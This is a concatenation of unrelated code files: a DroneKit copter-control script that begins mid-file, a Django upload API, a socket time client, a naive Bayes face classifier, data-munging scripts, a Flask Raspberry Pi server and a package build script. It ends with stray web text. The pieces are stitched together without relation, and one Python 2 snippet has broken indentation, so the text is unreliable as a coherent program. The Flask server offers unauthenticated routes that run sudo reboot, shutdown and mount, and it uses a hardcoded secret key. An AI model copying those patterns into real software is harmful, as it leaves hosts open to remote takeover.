        vehicle.send_mavlink(velocity_msg)
        time.sleep(1)
def goto_position_target_local_ned(north, east, down):
    """
    Ask the vehicle to fly to a position in the local NED (North, East, Down)
    frame, relative to the Home location, via SET_POSITION_TARGET_LOCAL_NED.
    """
    # type_mask 0b0000111111111000 enables only the position entries;
    # velocity, acceleration and yaw fields are ignored by the autopilot.
    position_msg = vehicle.message_factory.set_position_target_local_ned_encode(
        0,                                    # time_boot_ms (not used)
        0, 0,                                 # target system, target component
        mavutil.mavlink.MAV_FRAME_LOCAL_NED,  # coordinate frame
        0b0000111111111000,                   # type_mask (only positions enabled)
        north, east, down,                    # position setpoint (metres)
        0, 0, 0,                              # velocities (ignored)
        0, 0, 0,                              # accelerations (ignored)
        0, 0)                                 # yaw, yaw_rate (ignored)
    # One-shot: position targets persist on the autopilot side.
    vehicle.send_mavlink(position_msg)
def set_attitude(roll_angle = 0.0, pitch_angle = 0.0,
                 yaw_angle = None, yaw_rate = 0.0, use_yaw_rate = False,
                 thrust = 0.5, duration = 0):
    """
    Hold an attitude target for `duration` seconds by re-sending it at 10 Hz.

    Note that from AC3.3 the message should be re-sent more often than every
    second, as an ATTITUDE_TARGET order has a timeout of 1s.
    In AC3.2.1 and earlier the specified attitude persists until it is canceled.
    The code below should work on either version.
    Sending the message multiple times is the recommended way.
    """
    # BUG FIX: the original passed a hard-coded False instead of forwarding
    # `use_yaw_rate`, so callers could never select yaw-rate control.
    send_attitude_target(roll_angle, pitch_angle,
                         yaw_angle, yaw_rate, use_yaw_rate,
                         thrust)
    start = time.time()
    while time.time() - start < duration:
        send_attitude_target(roll_angle, pitch_angle,
                             yaw_angle, yaw_rate, use_yaw_rate,
                             thrust)
        time.sleep(0.1)
    # Reset attitude, or it will persist for 1s more due to the timeout.
    # use_yaw_rate=True with yaw_rate=0 deliberately freezes the yaw command.
    send_attitude_target(0, 0,
                         0, 0, True,
                         thrust)
def to_quaternion(roll = 0.0, pitch = 0.0, yaw = 0.0):
    """
    Convert an Euler attitude given in degrees to a [w, x, y, z] quaternion.
    """
    # Cosines/sines of the half-angles; the quaternion product of the three
    # axis rotations expands into the sums of products below.
    cy = math.cos(math.radians(yaw * 0.5))
    sy = math.sin(math.radians(yaw * 0.5))
    cr = math.cos(math.radians(roll * 0.5))
    sr = math.sin(math.radians(roll * 0.5))
    cp = math.cos(math.radians(pitch * 0.5))
    sp = math.sin(math.radians(pitch * 0.5))

    w = cy * cr * cp + sy * sr * sp
    x = cy * sr * cp - sy * cr * sp
    y = cy * cr * sp + sy * sr * cp
    z = sy * cr * cp - cy * sr * sp
    return [w, x, y, z]
"""
Convenience functions for sending immediate/guided mode commands to control the Copter.
The set of commands demonstrated here include:
* MAV_CMD_CONDITION_YAW - set direction of the front of the Copter (latitude, longitude)
* MAV_CMD_DO_SET_ROI - set direction where the camera gimbal is aimed (latitude, longitude, altitude)
* MAV_CMD_DO_CHANGE_SPEED - set target speed in metres/second.
The full set of available commands are listed here:
http://dev.ardupilot.com/wiki/copter-commands-in-guided-mode/
"""
def condition_yaw(heading, relative=False):
    """
    Point the vehicle at `heading` (degrees) via MAV_CMD_CONDITION_YAW.

    The heading is absolute by default; pass relative=True to yaw relative to
    the current heading. Note that once this command has been used, the yaw no
    longer follows the direction of travel and there is no way to restore that
    default behaviour (https://github.com/diydrones/ardupilot/issues/2427).

    For more information see:
    http://copter.ardupilot.com/wiki/common-mavlink-mission-command-messages-mav_cmd/#mav_cmd_condition_yaw
    """
    # param 4: 1 = offset from current yaw, 0 = absolute compass angle.
    is_relative = 1 if relative else 0
    # create the CONDITION_YAW command using command_long_encode()
    yaw_cmd = vehicle.message_factory.command_long_encode(
        0, 0,                                   # target system, target component
        mavutil.mavlink.MAV_CMD_CONDITION_YAW,  # command
        0,                                      # confirmation
        heading,      # param 1: target yaw in degrees
        0,            # param 2: yaw speed deg/s
        1,            # param 3: direction -1 ccw, 1 cw
        is_relative,  # param 4: relative offset 1, absolute angle 0
        0, 0, 0)      # params 5-7: not used
    vehicle.send_mavlink(yaw_cmd)
def pos_control_align_north_and_move_square():
    """Fly a SIZE_M-metre square at HEIGHT_M using absolute NED position targets."""
    print("SQUARE path using SET_POSITION_TARGET_LOCAL_NED and position parameters")
    DURATION_SEC = 2 #Set duration for each segment.
    HEIGHT_M = 2
    SIZE_M = 2
    """
    Fly the vehicle in a SIZE_M meter square path, using the SET_POSITION_TARGET_LOCAL_NED command
    and specifying a target position (rather than controlling movement using velocity vectors).
    The command is called from goto_position_target_local_ned() (via `goto`).
    The position is specified in terms of the NED (North East Down) relative to the Home location.
    WARNING: The "D" in NED means "Down". Using a positive D value will drive the vehicle into the ground!
    The code sleeps for a time (DURATION_SEC) to give the vehicle time to reach each position (rather than
    sending commands based on proximity).
    The code also sets the region of interest (MAV_CMD_DO_SET_ROI) via the `set_roi()` method. This points the
    camera gimbal at the the selected location (in this case it aligns the whole vehicle to point at the ROI).
    """
    print("Yaw 0 absolute (North)")
    condition_yaw(0)
    # Negative "down" component == fly HEIGHT_M metres above home.
    print("North (m): ", SIZE_M, ", East (m): 0m, Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
    goto_position_target_local_ned(SIZE_M, 0, -HEIGHT_M)
    time.sleep(DURATION_SEC)
    print("Yaw 90 absolute (East)")
    condition_yaw(90)
    print("North (m): ", SIZE_M, ", East (m): ", SIZE_M, " Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
    goto_position_target_local_ned(SIZE_M, SIZE_M, -HEIGHT_M)
    time.sleep(DURATION_SEC)
    print("Yaw 180 absolute (South)")
    condition_yaw(180)
    print("North (m): 0m, East (m): ", SIZE_M, ", Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
    goto_position_target_local_ned(0, SIZE_M, -HEIGHT_M)
    time.sleep(DURATION_SEC)
    print("Yaw 270 absolute (West)")
    condition_yaw(270)
    print("North (m): 0m, East (m): 0m, Height (m):", HEIGHT_M," for", DURATION_SEC, "seconds")
    goto_position_target_local_ned(0, 0, -HEIGHT_M)
    time.sleep(DURATION_SEC)
def vel_control_align_north_and_move_square():
    """
    Fly the vehicle in a path using velocity vectors (the underlying code calls the
    SET_POSITION_TARGET_LOCAL_NED command with the velocity parameters enabled).
    The thread sleeps for a time (DURATION) which defines the distance that will be travelled.
    The code also sets the yaw (MAV_CMD_CONDITION_YAW) using the `set_yaw()` method in each segment
    so that the front of the vehicle points in the direction of travel
    """
    #Set up velocity vector to map to each direction.
    # vx > 0 => fly North
    # vx < 0 => fly South
    NORTH = 0.5
    SOUTH = -0.5
    # Note for vy:
    # vy > 0 => fly East
    # vy < 0 => fly West
    EAST = 0.5
    WEST = -0.5
    # Note for vz:
    # vz < 0 => ascend
    # vz > 0 => descend
    UP = -0.5
    DOWN = 0.5
    # Set duration for each segment.
    DURATION_NORTH_SEC = 4
    DURATION_SOUTH_SEC = 4
    DURATION_EAST_SEC = 4
    DURATION_WEST_SEC = 4
    # Control path using velocity commands
    print("Point the vehicle to a specific direction, then moves using SET_POSITION_TARGET_LOCAL_NED and velocity parameters")
    print("Yaw 0 absolute (North)")
    condition_yaw(0)
    # A one-second zero-velocity burst stops the vehicle before each leg.
    send_ned_velocity(0, 0, 0, 1)
    print("Velocity North")
    send_ned_velocity(NORTH, 0, 0, DURATION_NORTH_SEC)
    send_ned_velocity(0, 0, 0, 1)
    print("Yaw 90 absolute (East)")
    condition_yaw(90)
    print("Velocity East")
    send_ned_velocity(0, EAST, 0, DURATION_EAST_SEC)
    send_ned_velocity(0, 0, 0, 1)
    print("Yaw 180 absolute (South)")
    condition_yaw(180)
    print("Velocity South")
    send_ned_velocity(SOUTH, 0, 0, DURATION_SOUTH_SEC)
    send_ned_velocity(0, 0, 0, 1)
    print("Yaw 270 absolute (West)")
    condition_yaw(270)
    print("Velocity West")
    send_ned_velocity(0, WEST, 0, DURATION_WEST_SEC)
    send_ned_velocity(0, 0, 0, 1)
    # NOTE(review): UP/DOWN are defined but never used in this path.
#######################################
# Main program starts here
#######################################
try:
    # If using SITL: Take off in GUIDED_NOGPS mode.
    if sitl is not None:
        arm_and_takeoff_nogps(20)
        print("Hold position for 3 seconds")
        set_attitude(duration = 3)
    # Wait until the RC channel is turned on and the corresponding channel is switch
    print("Starting autonomous control...")
    # Dispatch on flight mode: LOITER -> position-based square path,
    # GUIDED -> velocity-based square path; otherwise idle and keep polling.
    while True:
        if (vehicle.mode.name == "LOITER") and (rc_channel_value > rc_control_thres):
            pos_control_align_north_and_move_square()
        elif (vehicle.mode.name == "GUIDED") and (rc_channel_value > rc_control_thres):
            vel_control_align_north_and_move_square()
        else:
            print("Checking rc channel:", rc_control_channel, ", current value:", rc_channel_value, ", threshold to start: ", rc_control_thres)
            time.sleep(1)
    # print("Setting LAND mode...")
    # vehicle.mode = VehicleMode("LAND")
    # time.sleep(1)
    # NOTE(review): the while-loop above never breaks, so the shutdown code
    # below is unreachable; cleanup happens via the KeyboardInterrupt handler.
    # Close vehicle object before exiting script
    print("Close vehicle object")
    vehicle.close()
    # Shut down simulator if it was started.
    if sitl is not None:
        sitl.stop()
    print("Completed")
except KeyboardInterrupt:
    vehicle.close()
    print("Vehicle object closed.")
    sys.exit()
|
import os
from datetime import datetime

from django.db.models import F
from django.http import HttpResponse
from django.shortcuts import get_object_or_404
from rest_framework.authentication import TokenAuthentication
from rest_framework.parsers import FileUploadParser, JSONParser
from rest_framework.permissions import IsAuthenticated
from rest_framework.response import Response
from rest_framework.views import APIView

from core.common import UploadSummaryMixin
from core.models import Upload
from core.permissions import HasProperPassphrase
from core.serializers import (
    SummarySerializer,
    UploadSerializer,
    UploadSuccessSerializer,
)
class UploadAPIView(APIView):
    """
    Handles creating new Upload entries in the DB.
    This endpoints accepts either an application/json request with a JSON body
    and a URL key, or a file with the appropriate content-type set.
    Return 201 on successful creation or 400 for validation errors.
    """

    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]
    # FileUploadParser accepts all MIME types, so it needs
    # to be second to give JSONParser a chance.
    parser_classes = (JSONParser, FileUploadParser)

    def put(self, request):
        """Create an Upload from an uploaded file or a JSON-provided URL."""
        serializer = UploadSerializer(data=request.data)
        serializer.is_valid(raise_exception=True)  # Bail out early (400)
        # Robustness: .get() avoids a KeyError when a JSON payload carries no
        # "file" key; consistency: read both fields from validated_data (the
        # original mixed validated_data and serializer.data).
        upload = Upload()
        file_obj = serializer.validated_data.get("file")
        if file_obj is not None:
            upload.file = file_obj
        else:
            upload.url = serializer.validated_data["url"]
        upload.save()
        serializer = UploadSuccessSerializer(upload)
        return Response(serializer.data, status=201)
class AccessAPIView(APIView):
    """
    Asks for a password and serves the file or redirects to the given URL.
    """

    permission_classes = [HasProperPassphrase]

    def get(self, request, pk):
        """Serve the stored file (or return its URL) for a non-expired Upload."""
        # NOTE(review): datetime.now() is naive; if USE_TZ is enabled this
        # should be django.utils.timezone.now() -- confirm project settings.
        obj = get_object_or_404(Upload, pk=pk, expires_at__gt=datetime.now())
        self.check_object_permissions(request, obj)
        # Increment the attempt counter atomically in the database.
        # BUG FIX: the original assigned to `form.instance`, an undefined name
        # (and F() was never imported), raising NameError on every request.
        obj.successful_attempts = F("successful_attempts") + 1
        obj.save(update_fields=["successful_attempts"])
        if obj.file:
            file_path = obj.file.path
            with open(file_path, "rb") as f_out:
                response = HttpResponse(f_out.read())
            response[
                "Content-Disposition"
            ] = "attachment; filename=" + os.path.basename(file_path)
            return response
        else:
            return Response({"url": obj.url})
class SummaryAPIView(APIView, UploadSummaryMixin):
    """
    Displays some statistics on the submitted uploads.
    """

    authentication_classes = [TokenAuthentication]
    permission_classes = [IsAuthenticated]

    def get(self, request):
        """Return the serialized upload summary for authenticated clients."""
        summary = SummarySerializer(self.get_summary())
        return Response(summary.data)
|
#!/usr/bin/env python
"""Fetch the current time string from the NIST daytime service (port 13)."""
import socket

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    host = "time.nist.gov"
    port = 13
    s.connect((host, port))
    # The daytime service replies as soon as the connection is made; the
    # empty send is kept as a deliberate no-op write.
    s.sendall(b'')
    # BUG FIX: the encoding name was 'utf -8' (stray space); spell it
    # correctly instead of relying on codec-name normalization. Also renamed
    # the result variable so it no longer reads like the `time` module.
    reply = str(s.recv(4096), 'utf-8')
    print(reply)
sum = 0
for i in xrange(1, 101):
sum += i
print sum
lst = xrange(1, 101)
def add(x, y):
return x + y
print reduce(add, lst)
print reduce((lambda x, y: x + y), xrange(1, 101))
|
import numpy as np
import math
import matplotlib.pyplot as plt
class Bayesian_Model_Face:
    """Naive-Bayes classifier for 70x60 ASCII-art face images.

    Training summarizes each class by per-pixel counts of '#' and ' '
    characters; classification picks the label with the highest log2
    posterior. Labels are single digits read from the label files (for the
    face data only 0 and 1 occur, but ten slots are kept throughout).
    """

    def __init__(self):
        # Per-label, per-pixel counts of '#' vs ' ' (10 labels x 70 rows x
        # 60 columns). BUG FIX: the original omitted the label dimension,
        # making training_classes[label][i][j][char] fail immediately.
        self.training_classes = [
            [[{'#': 0, ' ': 0} for j in range(60)] for i in range(70)]
            for k in range(10)]
        self.training_labels = []
        # Raw test images: 150 images of 70x60 characters, blank-padded.
        self.testing_classes = [
            [[' ' for j in range(60)] for i in range(70)]
            for k in range(150)]
        self.testing_labels = []
        self.confusion_matrix = np.zeros((10, 10))
        # count of appearances of each label in the training sample
        self.count = np.zeros(10)
        self.priors = np.zeros(10)

    def parse_file(self, trainfile_name, trainlabel_name, testfile_name, testlabel_name, smooth_factor):
        """Load training/test images and labels, then smooth and compute priors.

        Each image spans 70 consecutive lines of its data file; labels are
        one digit per line in the label files.
        """
        trainfile = open(trainfile_name, 'r')
        trainlabel = open(trainlabel_name, 'r')
        for line in trainlabel:
            for ch in line:
                if ch.isdigit():
                    self.training_labels.append(int(ch))
        trainlabel.close()
        for label in self.training_labels:
            self.count[label] += 1
            for i in range(70):
                # BUG FIX: strip the newline so the trailing '\n' is neither
                # counted as a pixel nor indexed past the 60-column grid.
                image_line = trainfile.readline().rstrip('\n')
                for j in range(min(len(image_line), 60)):
                    self.training_classes[label][i][j][image_line[j]] += 1
        trainfile.close()
        self.laplace_smooth(smooth_factor)
        self.prior()
        testfile = open(testfile_name, 'r')
        testlabel = open(testlabel_name, 'r')
        for line in testlabel:
            for ch in line:
                if ch.isdigit():
                    self.testing_labels.append(int(ch))
        testlabel.close()
        for idx in range(len(self.testing_labels)):
            for i in range(70):
                image_line = testfile.readline().rstrip('\n')
                for j in range(min(len(image_line), 60)):
                    self.testing_classes[idx][i][j] = image_line[j]
        testfile.close()

    def laplace_smooth(self, factor):
        """Convert per-pixel counts into Laplace-smoothed log2 likelihoods."""
        for num in range(10):
            if self.count[num] > 0:
                # Two possible pixel values ('#' and ' '), hence factor*2.
                denom = math.log2(self.count[num] + factor * 2)
            else:
                # BUG FIX: the original used -inf here, which made unseen
                # classes infinitely LIKELY; +inf drives their log
                # likelihoods to -inf instead.
                denom = float('inf')
            for i in range(70):
                # BUG FIX: the original iterated range(len(image_line)),
                # a name that is not defined in this method (NameError).
                for j in range(60):
                    cell = self.training_classes[num][i][j]
                    for pixel in cell:
                        cell[pixel] = math.log2(cell[pixel] + factor) - denom

    def prior(self):
        """Compute class priors P(label) from the training counts."""
        total_count = sum(self.count)
        self.priors = [num / total_count for num in self.count]

    def test(self):
        """Train on the face data, classify the test set, and print metrics."""
        self.parse_file('./facedata/facedatatrain', './facedata/facedatatrainlabels',
                        './facedata/facedatatest', './facedata/facedatatestlabels', 1)
        predictions = []
        correct_counts = [0 for i in range(10)]
        total_counts = [0 for i in range(10)]
        correct = 0
        each = 0
        line = 0
        largest_posterior = [[float('-inf'), " "] for i in range(10)]
        smallest_posterior = [[float('inf'), " "] for i in range(10)]
        for label in self.testing_labels:
            maxi = float('-inf')
            mini = float('inf')
            predicted = 0
            for each_possibility in range(10):
                # BUG FIX: labels absent from the training set have prior 0
                # and the original's log2(0) raised ValueError; skip them.
                if self.priors[each_possibility] == 0:
                    continue
                possibility = math.log2(self.priors[each_possibility])
                for i in range(70):
                    # BUG FIX(review): the original scanned only 32 of the 60
                    # columns, apparently left over from a digit-classifier
                    # variant; scan the full face width -- confirm intent.
                    for j in range(60):
                        pixel = self.testing_classes[each][i][j]
                        possibility += self.training_classes[each_possibility][i][j][pixel]
                if possibility > maxi:
                    predicted = each_possibility
                    maxi = possibility
                if possibility < mini:
                    mini = possibility
            predictions.append(predicted)
            # Track the most/least confident example (by starting line in the
            # test file) for each true label.
            if maxi > largest_posterior[label][0]:
                largest_posterior[label][0] = maxi
                largest_posterior[label][1] = line
            if mini < smallest_posterior[label][0]:
                smallest_posterior[label][0] = mini
                smallest_posterior[label][1] = line
            self.confusion_matrix[predicted][label] += 1
            if label == predicted:
                correct += 1
                correct_counts[label] += 1
            total_counts[label] += 1
            each += 1
            # Each image spans 70 lines of the test file (was 33, another
            # digit-classifier leftover).
            line += 70
        correct_prec = correct / each
        # Normalize each confusion-matrix column by its class size;
        # guard against labels with no test examples (division by zero).
        for i in range(10):
            for j in range(10):
                if total_counts[j] > 0:
                    self.confusion_matrix[i][j] = self.confusion_matrix[i][j] / total_counts[j]
        print('For each digit, show the test examples from that class that have the highest and lowest posterior probabilities according to your classifier.')
        print(largest_posterior)
        print(smallest_posterior)
        print('Classification Rate For Each Digit:')
        for i in range(10):
            if total_counts[i] > 0:
                print(i, correct_counts[i] / total_counts[i])
        print('Confusion Matrix:')
        for i in range(10):
            print(self.confusion_matrix[i])
        print(predictions)
        print(correct_prec)
        # Visualize the four most confused off-diagonal label pairs.
        confusion_tuple = [((i, j), self.confusion_matrix[i][j]) for j in range(10) for i in range(10)]
        confusion_tuple = list(filter(lambda x: x[0][0] != x[0][1], confusion_tuple))
        confusion_tuple.sort(key=lambda x: -x[1])
        for i in range(4):
            feature1_pre = self.training_classes[confusion_tuple[i][0][0]]
            # BUG FIX: the per-pixel dicts are keyed '#'/' ', not '1'.
            feature1 = [[chardict['#'] for chardict in row] for row in feature1_pre]
            feature2_pre = self.training_classes[confusion_tuple[i][0][1]]
            feature2 = [[chardict['#'] for chardict in row] for row in feature2_pre]
            fig = [None for k in range(3)]
            axes = [None for k in range(3)]
            heatmap = [None for k in range(3)]
            features = [feature1, feature2, list(np.array(feature1) - np.array(feature2))]
            for k in range(3):
                fig[k], axes[k] = plt.subplots()
                heatmap[k] = axes[k].pcolor(features[k], cmap="jet")
                axes[k].invert_yaxis()
                axes[k].xaxis.tick_top()
                plt.tight_layout()
                plt.colorbar(heatmap[k])
                plt.show()
                # plt.savefig('src/binaryheatmap%.0f%d.png' % (i + 1, k + 1) )
|
-X FMLP -Q 0 -L 3 89 300
-X FMLP -Q 0 -L 3 79 300
-X FMLP -Q 0 -L 3 69 300
-X FMLP -Q 0 -L 3 61 200
-X FMLP -Q 1 -L 2 46 175
-X FMLP -Q 1 -L 2 42 150
-X FMLP -Q 1 -L 2 41 125
-X FMLP -Q 1 -L 2 38 125
-X FMLP -Q 2 -L 1 36 400
-X FMLP -Q 2 -L 1 24 150
-X FMLP -Q 2 -L 1 24 125
-X FMLP -Q 3 -L 1 14 125
-X FMLP -Q 3 -L 1 9 100
-X FMLP -Q 3 -L 1 8 100
|
#Purpose: manipulate data for plotting of Pressure vs Dilitation
# Ported to Python 3: tkinter module names, print() function, and a safe
# integer prompt (Python 2's bare input() eval'd whatever the user typed —
# an arbitrary-code-execution hazard).
from tkinter import Tk
from tkinter.filedialog import askopenfilename

# Hide the blank root window so only the file-picker dialog appears.
Tk().withdraw()
###############################################################################
filename = askopenfilename()
print("Working with file:", filename)
# Stride used to thin the data below; parsed as an explicit integer.
scale = int(input('What modulo do you want to manipulate the data? '))

# Read the whole file as whitespace-split rows of strings.
data = []
with open(filename) as inputfile:
    for line in inputfile:
        data.append(line.strip().split())
###############################################################################
#Access data from columns 5 (avg pressure) and 9 (volume)
press_vol_data = [[row[4], row[8]] for row in data]
print(press_vol_data)

#Apply the scale to clean data: keep every `scale`-th row only.
press_vol_data_scale = [row for i, row in enumerate(press_vol_data)
                        if i % scale == 0]
print(len(press_vol_data_scale))
print(press_vol_data_scale)
#################################################################################
# `with` guarantees the output file is flushed and closed — the original
# opened it and never closed it (resource leak / possible truncated output).
with open("data_scale" + str(scale) + ".txt", 'w') as dataFile:
    for row in press_vol_data_scale:
        dataFile.write("\t".join(row) + '\n')
print("All done!")
|
from flask import Flask
from flask import request
from flask import make_response
from werkzeug import secure_filename
from flask import url_for
from flask import render_template
from flask import send_from_directory
import os
app = Flask(__name__)
# Directory that /upload saves into and /files/<filename> serves from.
# NOTE(review): hardcoded absolute path — only valid on this specific host.
app.config['UPLOAD_FOLDER'] = '/Users/qylk/'
# NOTE(review): hardcoded, trivially guessable secret key — anything signed
# with it (sessions, cookies) is forgeable; should come from the environment.
app.secret_key = '123456'
@app.route('/')
def index():
    """Landing page: plain-text greeting confirming the server is up."""
    greeting = 'Hello Raspberry!'
    return greeting
@app.errorhandler(404)
def page_not_found(error):
    """Custom 404 handler: plain-text body with an explicit 404 status."""
    body = 'page_not_found'
    return body, 404
@app.route('/disk/<command>')
def disk_mount(command):
    """Mount or unmount the USB drive /dev/sda1.

    URL commands: 'mount' attaches it at /media/pi/nas, 'unmount'
    detaches it. Returns the shell command's console output.
    """
    # The original tested `if cmp(command, 'mount'):` — cmp() is nonzero
    # when the strings DIFFER, so both branches were inverted (and cmp()
    # no longer exists in Python 3). Compare for equality instead.
    if command == 'mount':
        output = os.popen('sudo mount /dev/sda1 /media/pi/nas')
    elif command == 'unmount':
        # The shell utility is `umount`; the original spawned the
        # nonexistent command `unmount`.
        output = os.popen('sudo umount /dev/sda1')
    else:
        return 'command not recognized'
    # Return (not print) the output: a Flask view must not return None.
    return output.read()
@app.route('/dlna/<command>')
def dlna(command):
    """Start or stop the minidlna media server; returns console output."""
    # cmp() was truthy when the strings differed (branches inverted) and is
    # gone in Python 3 — test equality directly.
    if command == 'start':
        output = os.popen('sudo service minidlna start')
    elif command == 'stop':
        output = os.popen('sudo service minidlna stop')
    else:
        return "command not recognized"
    # Return (not print) the output so the view yields a valid response
    # instead of None (which Flask rejects with a 500).
    return output.read()
@app.route('/reboot')
def reboot():
    """Reboot the host.

    The response may never reach the client if the reboot wins the race.
    """
    output = os.popen('sudo reboot')
    # Return (not Python-2 print) the output so the view does not return
    # None, which Flask treats as an error.
    return output.read()
@app.route('/shutdown')
def shutdown():
    """Power the host off immediately.

    The response may never reach the client once the shutdown proceeds.
    """
    output = os.popen('sudo shutdown -h now')
    # Return (not Python-2 print) the output so the view does not return
    # None, which Flask treats as an error.
    return output.read()
@app.route('/upload', methods=['GET', 'POST'])
def upload_file():
    """GET: render the upload form. POST: save the submitted file.

    A POST without a usable file falls through to the form as well.
    """
    if request.method != 'POST':
        return render_template('upload.html')
    uploaded = request.files['file']
    if not uploaded:
        return render_template('upload.html')
    safe_name = secure_filename(uploaded.filename)
    destination = os.path.join(app.config['UPLOAD_FOLDER'], safe_name)
    uploaded.save(destination)
    return 'upload success!'
@app.route('/files/<filename>')
def uploaded_file(filename):
    """Serve a previously uploaded file out of the upload folder."""
    upload_dir = app.config['UPLOAD_FOLDER']
    return send_from_directory(upload_dir, filename)
# =============test===========================
@app.route('/post/<int:post_id>')
def show_post(post_id):
    """Demo endpoint: show the post with the given integer id."""
    message = 'Post %d' % post_id
    return message
@app.route('/cookie')
def cookie():
    """Render the hello page and set a demo 'username' cookie on it."""
    rendered = render_template('hello.html', name='qylk')
    response = make_response(rendered)
    response.set_cookie('username', 'qylk')
    return response
@app.route('/login', methods=['GET', 'POST'])
def login():
    # Placeholder endpoint: both branches are unimplemented stubs, so the
    # view returns None and Flask answers with a 500 until it is filled in.
    if request.method == 'POST':
        # TODO: handle submitted credentials.
        pass
    else:
        # TODO: render the login form.
        pass
@app.route('/file')
def file():
    """Demo endpoint: return the URL Flask generates for the stylesheet."""
    # Name kept as-is (shadows the Python 2 builtin) because renaming would
    # change the Flask endpoint name used by url_for('file').
    static_url = url_for('static', filename='style.css')
    return static_url
@app.route('/hello/<name>')
def hello(name=None):
    """Render the hello template, greeting *name*."""
    page = render_template('hello.html', name=name)
    return page
if __name__ == '__main__':
    # Development server only — debug=True enables the interactive
    # debugger and must not be exposed in production.
    app.run(debug=True)
|
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 3.
# See the file http://www.gnu.org/licenses/gpl.txt
from pisi.actionsapi import pythonmodules
from pisi.actionsapi import pisitools
from pisi.actionsapi import get
from pisi.actionsapi import shelltools
# Name of the unpacked source directory, derived from the source version
# declared in the package spec.
WorkDir="setuptools-%s" % get.srcVERSION()
def setup():
    """Stage a second copy of the source tree for a Python 3 build."""
    shelltools.makedirs("python3")
    # Copy the unpacked setuptools tree into <workdir>/python3 so install()
    # can build that copy with Python 3.
    shelltools.copytree("../setuptools-%s" % get.srcVERSION(), "%s/python3" % get.workDIR())
def install():
    """Install the staged Python 3 copy of setuptools into the package."""
    #pythonmodules.install()
    #pisitools.remove("/usr/lib/%s/site-packages/setuptools/*.exe" % get.curPYTHON())
    # Build/install from the python3 copy staged by setup().
    shelltools.cd("%s/python3" % get.workDIR())
    pythonmodules.install(pyVer = "3")
    #pisitools.remove("/usr/lib/python3.4/site-packages/setuptools/*.exe")
    # Rename the console script so it does not collide with the Python 2
    # package's /usr/bin/easy_install.
    pisitools.rename("/usr/bin/easy_install", "py3easy-install")
    #avoid python-setuptools conflict
    pisitools.removeDir("/usr/share")
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.